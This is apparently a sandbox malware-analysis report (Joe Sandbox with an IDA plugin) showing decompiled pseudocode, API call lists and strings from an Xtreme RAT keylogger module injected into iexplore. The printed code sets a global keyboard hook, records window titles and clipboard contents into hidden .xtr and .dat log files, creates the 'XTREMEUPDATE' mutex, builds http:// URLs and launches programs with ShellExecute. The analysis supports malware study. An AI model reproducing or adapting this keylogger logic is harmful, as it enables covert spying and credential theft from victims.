									E00C85084(_t321, _t320 + _t320,  &_v830, 0,  &_v12);
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_t328 = E00C81D04(_v40) + _t327;
									__eflags = _t328;
									_t330 = E00C81CF4(_v40);
									_t331 =  *0xc8dee8; // 0xd0
									_t524 = _t328;
									E00C85084(_t331, _t524, _t330);
								}
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v24) + _t267);
								_t270 = E00C81CF4(_v24);
								_t271 =  *0xc8dee8; // 0xd0
								_pop(_t517);
								E00C85084(_t271, _t517, _t270);
								__eflags =  *0xc8b0b8;
								if( *0xc8b0b8 != 0) {
									__eflags =  *0xc8b0bc - 1;
									if( *0xc8b0bc == 1) {
										_t494 = VirtualAlloc(0, E00C81D04(_v24) + _t274, 0x1000, 0x40);
										_push(E00C81D04(_v24) + _t278);
										E00C82914(_t494, E00C81CF4(_v24));
										_t286 = E00C81D04(_v24) + _t285;
										__eflags = _t286;
										_t287 =  *0xc8dee0; // 0xc1f6
										_t288 =  *0xc8b0b8; // 0x0
										PostMessageA(_t288, _t287, _t286, _t494);
									}
								}
								 *0xc8dff5 = 0;
								 *0xc8dff4 = 0;
							}
						}
					}
					goto L57;
				} else {
					if( *0xc8b0c4 != 0) {
						_t485 =  *0xc8b0c4; // 0x0
						UnhookWindowsHookEx(_t485);
					}
					 *0xc8b0c4 = SetWindowsHookExW(0xd, E00C86748, GetModuleHandleA(0), 0);
					L57:
					_pop(_t539);
					 *[fs:eax] = _t539;
					_push(E00C87281);
					E00C81B78( &_v40);
					return E00C81B90( &_v24, 2);
				}
			}

0x00c86951
0x00c86952
0x00c86953
0x00c86956
0x00c86959
0x00c8695c
0x00c8695f
0x00c86962
0x00c86965
0x00c8696a
0x00c8696b
0x00c86970
0x00c86973
0x00c8697d
0x00c86982
0x00c86985
0x00c8698b
0x00c869c2
0x00c869c8
0x00c86f8e
0x00c86f94
0x00c871bb
0x00c871c1
0x00c871e0
0x00c871e6
0x00c87203
0x00c87209
0x00c8720b
0x00c87212
0x00c8721a
0x00c87220
0x00c87225
0x00c8722b
0x00c87230
0x00c8723a
0x00c87244
0x00c8724b
0x00c8724d
0x00c87252
0x00c87252
0x00c8724b
0x00c87212
0x00c871e8
0x00c871e8
0x00c871ef
0x00c871fe
0x00c871f1
0x00c871f1
0x00c871f7
0x00c871f7
0x00c871ef
0x00c871c3
0x00c871c3
0x00c871ca
0x00c871cc
0x00c871d2
0x00c871d2
0x00c871d9
0x00c871d9
0x00000000
0x00c871c1
0x00c86f9a
0x00c86fa1
0x00000000
0x00000000
0x00c86fa7
0x00c86fae
0x00c86fc1
0x00c86fcf
0x00c86fdc
0x00c86fe1
0x00c86fe3
0x00000000
0x00000000
0x00c86fe9
0x00c86fed
0x00c86ffb
0x00000000
0x00000000
0x00c87001
0x00c87001
0x00c87008
0x00c87012
0x00c8701a
0x00c8701b
0x00c87027
0x00c8702b
0x00c87034
0x00c87039
0x00c8703a
0x00c87042
0x00c87043
0x00c8704d
0x00c8704d
0x00c87052
0x00c87057
0x00c87058
0x00c87058
0x00c87065
0x00c8706d
0x00c8706e
0x00c8707a
0x00c8707e
0x00c87085
0x00c8708a
0x00c8708b
0x00c87096
0x00c870a7
0x00c870b6
0x00c870bb
0x00c870c8
0x00c870d0
0x00c870d1
0x00c870dd
0x00c870e1
0x00c870ea
0x00c870ef
0x00c870f0
0x00c87101
0x00c87106
0x00c8710e
0x00c8710f
0x00c8711b
0x00c8711e
0x00c87123
0x00c87124
0x00c87131
0x00c87139
0x00c8713a
0x00c87146
0x00c8714a
0x00c87151
0x00c87156
0x00c87157
0x00c87164
0x00c8716c
0x00c8716d
0x00c87179
0x00c8717d
0x00c87186
0x00c8718b
0x00c8718c
0x00c87194
0x00c87195
0x00c871a1
0x00c871a4
0x00c871a9
0x00c871aa
0x00c871af
0x00000000
0x00c871af
0x00c86fef
0x00c86ff3
0x00000000
0x00000000
0x00000000
0x00c86ff9
0x00c86fb0
0x00c869ce
0x00c869d9
0x00c869e1
0x00c869e9
0x00c869f8
0x00c869fd
0x00c86a0a
0x00c86a12
0x00c86a17
0x00c86a1f
0x00c86a24
0x00c86a27
0x00c86a2a
0x00c86a34
0x00c86a34
0x00c86a3c
0x00c86a41
0x00c86a43
0x00c86a65
0x00c86a6a
0x00c86a71
0x00c86a77
0x00c86a7a
0x00c86b2f
0x00c86b37
0x00c86b38
0x00c86b44
0x00c86b48
0x00c86b4f
0x00c86b54
0x00c86b55
0x00c86b5d
0x00c86b5e
0x00c86b6a
0x00c86b6e
0x00c86b75
0x00c86b7a
0x00c86b7b
0x00c86b80
0x00c86b87
0x00c86b89
0x00c86b90
0x00c86bab
0x00c86bb7
0x00c86bc5
0x00c86bd3
0x00c86bd3
0x00c86bd6
0x00c86bdc
0x00c86be2
0x00c86be2
0x00c86b90
0x00c86bef
0x00c86bf7
0x00c86bf8
0x00c86c04
0x00c86c08
0x00c86c0f
0x00c86c14
0x00c86c15
0x00c86c22
0x00c86c2a
0x00c86c2b
0x00c86c37
0x00c86c3b
0x00c86c42
0x00c86c47
0x00c86c48
0x00c86c4d
0x00c86c54
0x00c86c56
0x00c86c5d
0x00c86c78
0x00c86c84
0x00c86c92
0x00c86ca0
0x00c86ca0
0x00c86ca3
0x00c86ca9
0x00c86caf
0x00c86caf
0x00c86c5d
0x00c86cba
0x00c86ccb
0x00c86cda
0x00c86cdf
0x00c86ce4
0x00c86ceb
0x00c86ced
0x00c86cf4
0x00c86d12
0x00c86d1a
0x00c86d2b
0x00c86d3c
0x00c86d3c
0x00c86d3f
0x00c86d45
0x00c86d4b
0x00c86d4b
0x00c86cf4
0x00c86d58
0x00c86d60
0x00c86d61
0x00c86d6d
0x00c86d71
0x00c86d78
0x00c86d7d
0x00c86d7e
0x00c86d83
0x00c86d8a
0x00c86d8c
0x00c86d93
0x00c86dae
0x00c86dba
0x00c86dc8
0x00c86dd6
0x00c86dd6
0x00c86dd9
0x00c86ddf
0x00c86de5
0x00c86de5
0x00c86d93
0x00c86dea
0x00c86df1
0x00c86df1
0x00c86df8
0x00c86dff
0x00c86e0d
0x00c86e15
0x00c86e16
0x00c86e22
0x00c86e26
0x00c86e2f
0x00c86e34
0x00c86e35
0x00c86e3d
0x00c86e3e
0x00c86e4a
0x00c86e4d
0x00c86e52
0x00c86e53
0x00c86e60
0x00c86e68
0x00c86e69
0x00c86e75
0x00c86e79
0x00c86e80
0x00c86e85
0x00c86e86
0x00c86e91
0x00c86ea2
0x00c86eb1
0x00c86eb6
0x00c86ec3
0x00c86ecb
0x00c86ecc
0x00c86ed6
0x00c86ed6
0x00c86edc
0x00c86ee3
0x00c86ee8
0x00c86ee9
0x00c86ee9
0x00c86ef1
0x00c86ef2
0x00c86efe
0x00c86f02
0x00c86f09
0x00c86f0e
0x00c86f0f
0x00c86f14
0x00c86f1b
0x00c86f1d
0x00c86f24
0x00c86f3f
0x00c86f4b
0x00c86f59
0x00c86f67
0x00c86f67
0x00c86f6a
0x00c86f70
0x00c86f76
0x00c86f76
0x00c86f24
0x00c86f7b
0x00c86f82
0x00c86f82
0x00c86a71
0x00c86a43
0x00000000
0x00c8698d
0x00c86994
0x00c86996
0x00c8699c
0x00c8699c
0x00c869b8
0x00c87257
0x00c87259
0x00c8725c
0x00c8725f
0x00c87267
0x00c87279
0x00c87279

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 00C8697D
UnhookWindowsHookEx.USER32(00000000), ref: 00C8699C
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00C8727A), ref: 00C869A5
SetWindowsHookExW.USER32(0000000D,Function_00006748,00000000,00000000), ref: 00C869B3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00C8727A), ref: 00C86A0A

Part of subcall function 00C868EC: GetForegroundWindow.USER32 ref: 00C86914
Part of subcall function 00C868EC: GetWindowTextW.USER32(00000000,?,00002712), ref: 00C8692A

PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86F76

Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
Part of subcall function 00C85568: ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86AE6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86B22
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86BA6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86BE2
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00C86C73
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86CAF
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?), ref: 00C86D0D
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86D4B
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00C86DA9
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86DE5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86F3A

Part of subcall function 00C8389C: OpenClipboard.USER32 ref: 00C838BD
Part of subcall function 00C8389C: GetClipboardData.USER32(0000000D), ref: 00C838DA
Part of subcall function 00C8389C: GlobalFix.KERNEL32(00000000), ref: 00C838FA
Part of subcall function 00C8389C: GlobalSize.KERNEL32(00000000), ref: 00C83905
Part of subcall function 00C8389C: GlobalUnWire.KERNEL32(00000000), ref: 00C83925
Part of subcall function 00C8389C: CloseClipboard.USER32 ref: 00C83943

Part of subcall function 00C85084: WriteFile.KERNEL32(000000D0,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

UnhookWindowsHookEx.USER32(00000000), ref: 00C871D2
SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000000,00000000,00C8727A), ref: 00C87220
SetEndOfFile.KERNEL32(000000D0,000000D0,00000000,00000000,00000000,00000000,00C8727A), ref: 00C8722B

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

--- , xrefs: 00C86C1D, 00C86E5B
, xrefs: 00C86A90
[CLIPBOARD] ---- , xrefs: 00C87060
}_, xrefs: 00C86BEA
_{ , xrefs: 00C86B2A
[CLIPBOARD END], xrefs: 00C8712C

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88BC0, Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 182
librarysleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00C88BC0(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t46;
				long _t47;
				char* _t48;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr* _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t63;
				char* _t69;
				char* _t72;
				intOrPtr* _t79;
				intOrPtr* _t82;
				void* _t105;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr _t134;
				intOrPtr _t141;
				signed int _t144;
				intOrPtr _t147;

				_t146 = _t147;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t105 = _a4;
				_push(_t147);
				_push(0xc88e3f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				LoadLibraryA("user32.dll");
				LoadLibraryA("urlmon.dll"); // executed
				LoadLibraryA("wininet.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("Shell32.dll"); // executed
				_t46 = E00C8263C(0, 0, _t105 + 0x1310); // executed
				_v8 = _t46;
				_t47 = GetLastError();
				_t150 = _t47 - 0xb7;
				if(_t47 == 0xb7) {
					ExitProcess(0);
				}
				_t48 =  *0xc8b0f8; // 0xc8e014
				 *_t48 =  *((intOrPtr*)(_t105 + 0x1818));
				_t50 = E00C833A8(_t105 + 0x1618, 0xc88e90, _t150);
				_t116 =  *0xc8b100; // 0xc8e018
				 *_t116 = _t50;
				_t53 = E00C833A8(E00C836D8(_t105 + 0x1c30, _t150), _t105 + 0x1310, _t150);
				_t118 =  *0xc8b0f0; // 0xc8e01c
				 *_t118 = _t53;
				_t54 =  *0xc8b0f0; // 0xc8e01c
				_t56 = E00C833A8( *_t54, L".xtr", _t150);
				_t120 =  *0xc8b0f0; // 0xc8e01c
				 *_t120 = _t56;
				_t59 = E00C833A8(E00C836D8(_t105 + 0x1c30, _t150), _t105 + 0x1310, _t150);
				_t122 =  *0xc8b0f4; // 0xc8dec8
				 *_t122 = _t59;
				_t60 =  *0xc8b0f4; // 0xc8dec8
				_t62 = E00C833A8( *_t60, L".dat", _t150);
				_t124 =  *0xc8b0f4; // 0xc8dec8
				 *_t124 = _t62;
				_t63 =  *0xc8b0ec; // 0xc8c6ac
				_t143 = _t105;
				memcpy(_t63, _t105, 0x607 << 2);
				if( *((char*)(_t105 + 0x139c)) == 1) {
					E00C87744(_t143, _t146);
				}
				_t144 = 0;
				_t141 =  *0xc8b0fc; // 0xc8e000
				do {
					E00C81B78( &_v16);
					if( *((intOrPtr*)(_t105 + _t144 * 4)) > 0) {
						E00C81CD8( &_v20, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2);
						E00C81DBC(_v20, 0);
						if(0 != 0) {
							_push(L"http://");
							_t130 = _t105 + 0x14 + _t144 * 0x29 * 2;
							E00C81CD8( &_v24, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2);
							_push(_v24);
							_push(E00C88EC4);
							asm("cdq");
							E00C82E14( &_v28, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2,  *((intOrPtr*)(_t105 + _t144 * 4)), _t130);
							_push(_v28);
							_push(E00C88ECC);
							E00C82E14( &_v32, 0x29, 0,  *((intOrPtr*)(_t105 + 0x11b4)), 0);
							_push(_v32);
							_push(L".functions");
							E00C81D74();
						}
					}
					E00C81DBC(_v16, 0);
					if(0 != 0) {
						E00C81BB4(_t141, _v16);
					}
					_t144 = _t144 + 1;
					_t141 = _t141 + 4;
				} while (_t144 != 5);
				_t69 =  *0xc8b104; // 0xc8b0d0
				 *_t69 = 0;
				E00C8384C(E00C87D60, 0, 0);
				while(1) {
					_t72 =  *0xc8b104; // 0xc8b0d0
					if( *_t72 != 0) {
						break;
					}
					Sleep(0xa);
					E00C83838();
				}
				CloseHandle(_v8);
				CloseHandle(_v12);
				E00C8684C();
				_t79 =  *0xc8b0f0; // 0xc8e01c
				E00C83674( *_t79);
				_t82 =  *0xc8b0e8; // 0xc8e020
				if( *_t82 == 0) {
					ExitProcess(0);
				}
				ShellExecuteW(0, L"open", _t105 + 0x181c, 0, 0, 0);
				ExitProcess(0);
				_pop(_t134);
				 *[fs:eax] = _t134;
				_push(E00C88E46);
				return E00C81B90( &_v32, 5);
			}

0x00c88bc1
0x00c88bc5
0x00c88bc6
0x00c88bc7
0x00c88bc8
0x00c88bc9
0x00c88bca
0x00c88bcb
0x00c88bcf
0x00c88bd4
0x00c88bd5
0x00c88bda
0x00c88bdd
0x00c88be5
0x00c88bef
0x00c88bf9
0x00c88c03
0x00c88c0d
0x00c88c1d
0x00c88c22
0x00c88c25
0x00c88c2a
0x00c88c2f
0x00c88c33
0x00c88c33
0x00c88c38
0x00c88c43
0x00c88c50
0x00c88c55
0x00c88c5b
0x00c88c6e
0x00c88c73
0x00c88c79
0x00c88c80
0x00c88c87
0x00c88c8c
0x00c88c92
0x00c88ca5
0x00c88caa
0x00c88cb0
0x00c88cb7
0x00c88cbe
0x00c88cc3
0x00c88cc9
0x00c88ccb
0x00c88cd2
0x00c88cd9
0x00c88ce2
0x00c88ce4
0x00c88ce4
0x00c88ce9
0x00c88ceb
0x00c88cf1
0x00c88cf4
0x00c88cfd
0x00c88d0e
0x00c88d18
0x00c88d1d
0x00c88d1f
0x00c88d2a
0x00c88d33
0x00c88d38
0x00c88d3b
0x00c88d43
0x00c88d49
0x00c88d4e
0x00c88d51
0x00c88d63
0x00c88d68
0x00c88d6b
0x00c88d78
0x00c88d78
0x00c88d1d
0x00c88d82
0x00c88d87
0x00c88d8e
0x00c88d8e
0x00c88d93
0x00c88d94
0x00c88d97
0x00c88da0
0x00c88da5
0x00c88db3
0x00c88dc6
0x00c88dc6
0x00c88dce
0x00000000
0x00000000
0x00c88dbc
0x00c88dc1
0x00c88dc1
0x00c88dd4
0x00c88ddd
0x00c88de2
0x00c88de7
0x00c88dee
0x00c88df3
0x00c88dfb
0x00c88dff
0x00c88dff
0x00c88e18
0x00c88e1f
0x00c88e26
0x00c88e29
0x00c88e2c
0x00c88e3e

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C8384C: CreateThread.KERNEL32(00000000,00000000,00C87D60,00000000,?,?), ref: 00C83862
Part of subcall function 00C8384C: SetThreadPriority.KERNEL32(00000000,00000000,00000001,?,00000000,?,00C88DB8,00000000), ref: 00C8386B

Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
CloseHandle.KERNEL32(?), ref: 00C88DD4
CloseHandle.KERNEL32(?), ref: 00C88DDD

Part of subcall function 00C8684C: SendMessageA.USER32(00100164,0000C1F2,00000000,00000000), ref: 00C86865
Part of subcall function 00C8684C: CloseHandle.KERNEL32(000000D0), ref: 00C86879

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Part of subcall function 00C87744: ShowWindow.USER32(00100164,00000000), ref: 00C8777B
Part of subcall function 00C87744: SetFileAttributesW.KERNEL32(00460000,00000080), ref: 00C8778B
Part of subcall function 00C87744: CreateFileW.KERNEL32(00460000,C0000000,00000003,00000000,00000004,00000000,00000000), ref: 00C877A5
Part of subcall function 00C87744: GetFileSize.KERNEL32(000000D0,00000000,00460000,C0000000,00000003,00000000,00000004,00000000,00000000,00460000,00000080), ref: 00C877C4
Part of subcall function 00C87744: SetFileAttributesW.KERNEL32(00460000,00000007,000000D0,00000000,00460000,C0000000,00000003,00000000,00000004,00000000,00000000,00460000,00000080), ref: 00C8781C
Part of subcall function 00C87744: SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000002,00460000,00000007,000000D0,00000000,00460000,C0000000,00000003,00000000,00000004,00000000,00000000,00460000), ref: 00C8782D
Part of subcall function 00C87744: SendMessageA.USER32(00100164,0000C1F3,00000000,00000000), ref: 00C87888
Part of subcall function 00C87744: SetClipboardViewer.USER32(00100164), ref: 00C87893

Strings

.functions, xrefs: 00C88D6B
wininet.dll, xrefs: 00C88BF4
open, xrefs: 00C88E11
user32.dll, xrefs: 00C88BE0
http://, xrefs: 00C88D1F
.xtr, xrefs: 00C88C7B
urlmon.dll, xrefs: 00C88BEA
.dat, xrefs: 00C88CB2
advapi32.dll, xrefs: 00C88BFE
Shell32.dll, xrefs: 00C88C08

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C87744, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108
windowclipboard

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00C87744(void* __esi, void* __ebp) {
				int _v8;
				long _v12;
				char _v16;
				char _v19;
				char _v20;
				void* __ebx;
				struct HWND__* _t11;
				WCHAR* _t13;
				WCHAR* _t15;
				struct HWND__* _t16;
				void* _t17;
				long _t18;
				WCHAR* _t19;
				void* _t21;
				int _t23;
				int _t24;
				int _t26;
				struct HWND__* _t27;
				struct HWND__* _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t37;
				int _t42;
				int _t45;
				void* _t48;

				_t48 = __esi;
				E00C8684C();
				 *0xc8dff5 = 1;
				_t41 = L"XtremeKeylogger";
				if( *0xc8b0b4 <= 0) {
					 *0xc8b0b4 = E00C87348(L"XtremeKeylogger", E00C86948);
				}
				_t11 =  *0xc8b0b4; // 0x100164
				ShowWindow(_t11, 0); // executed
				_t13 =  *0xc8dec8; // 0x460000
				SetFileAttributesW(_t13, 0x80); // executed
				_t15 =  *0xc8dec8; // 0x460000
				_t16 = CreateFileW(_t15, 0xc0000000, 3, 0, 4, 0, 0); // executed
				 *0xc8dee8 = _t16;
				if( *0xc8dee8 != 0xffffffff) {
					_t17 =  *0xc8dee8; // 0xd0
					_t18 = GetFileSize(_t17, 0);
					_t45 = 0;
					_v12 = _t18;
					_v8 = 0;
					if(_v8 != 0 || _v12 != 0) {
						 *0xc8dff4 = 0;
					} else {
						_v20 = 0xff;
						_v19 = 0xfe;
						_t45 =  &_v20;
						_t37 =  *0xc8dee8; // 0xd0, executed
						E00C85084(_t37, 2, _t45, 0,  &_v16); // executed
						 *0xc8dff4 = 1;
					}
					_t19 =  *0xc8dec8; // 0x460000
					SetFileAttributesW(_t19, 7); // executed
					_t21 =  *0xc8dee8; // 0xd0
					SetFilePointer(_t21, 0, 0, 2); // executed
					_t23 = E00C852E8(_t41); // executed
					_t42 = _t23;
					_t24 = _t42;
					asm("cdq");
					if(_t45 != _v8) {
						if(__eflags <= 0) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						if(_t24 <= _v12) {
							L12:
							asm("cdq");
							 *0xc8b0c8 = _t42;
							 *0xc8b0cc = _t45;
						} else {
							L11:
							 *0xc8b0c8 = 0;
							 *0xc8b0cc = 0;
							E00C853EC(0, _t41, _t48);
						}
					}
					_t26 =  *0xc8ded4; // 0xc1f3
					_t27 =  *0xc8b0b4; // 0x100164
					SendMessageA(_t27, _t26, 0, 0);
					_t29 =  *0xc8b0b4; // 0x100164
					_t16 = SetClipboardViewer(_t29);
					if( *0xc8da4b == 1) {
						if( *0xc8dffc != 0) {
							_t32 =  *0xc8dffc; // 0x0
							E00C8387C(_t32);
						}
						_t31 = E00C8384C(E00C87614, 0, 0);
						 *0xc8dffc = _t31;
						return _t31;
					}
				}
				return _t16;
			}

0x00c87744
0x00c87748
0x00c8774d
0x00c87754
0x00c87760
0x00c8776e
0x00c8776e
0x00c87775
0x00c8777b
0x00c87785
0x00c8778b
0x00c8779f
0x00c877a5
0x00c877aa
0x00c877b6
0x00c877be
0x00c877c4
0x00c877c9
0x00c877cb
0x00c877cf
0x00c877d8
0x00c8780d
0x00c877e1
0x00c877e1
0x00c877e5
0x00c877f1
0x00c877fa
0x00c877ff
0x00c87804
0x00c87804
0x00c87816
0x00c8781c
0x00c87827
0x00c8782d
0x00c87832
0x00c87837
0x00c87839
0x00c8783b
0x00c87840
0x00c8784a
0x00000000
0x00000000
0x00000000
0x00000000
0x00c87842
0x00c87846
0x00c87869
0x00c8786b
0x00c8786c
0x00c87872
0x00c87848
0x00c8784c
0x00c8784c
0x00c87856
0x00c87862
0x00c87862
0x00c87846
0x00c8787c
0x00c87882
0x00c87888
0x00c8788d
0x00c87893
0x00c8789f
0x00c878a8
0x00c878aa
0x00c878af
0x00c878af
0x00c878bf
0x00c878c4
0x00000000
0x00c878c4
0x00c8789f
0x00c878cd

APIs

Part of subcall function 00C8684C: SendMessageA.USER32(00100164,0000C1F2,00000000,00000000), ref: 00C86865
Part of subcall function 00C8684C: CloseHandle.KERNEL32(000000D0), ref: 00C86879

ShowWindow.USER32(00100164,00000000), ref: 00C8777B
SetFileAttributesW.KERNEL32(00460000,00000080), ref: 00C8778B
CreateFileW.KERNEL32(00460000,C0000000,00000003,00000000,00000004,00000000,00000000), ref: 00C877A5
GetFileSize.KERNEL32(000000D0,00000000,00460000,C0000000,00000003,00000000,00000004,00000000,00000000,00460000,00000080), ref: 00C877C4
SetFileAttributesW.KERNEL32(00460000,00000007,000000D0,00000000,00460000,C0000000,00000003,00000000,00000004,00000000,00000000,00460000,00000080), ref: 00C8781C
SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000002,00460000,00000007,000000D0,00000000,00460000,C0000000,00000003,00000000,00000004,00000000,00000000,00460000), ref: 00C8782D

Part of subcall function 00C852E8: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
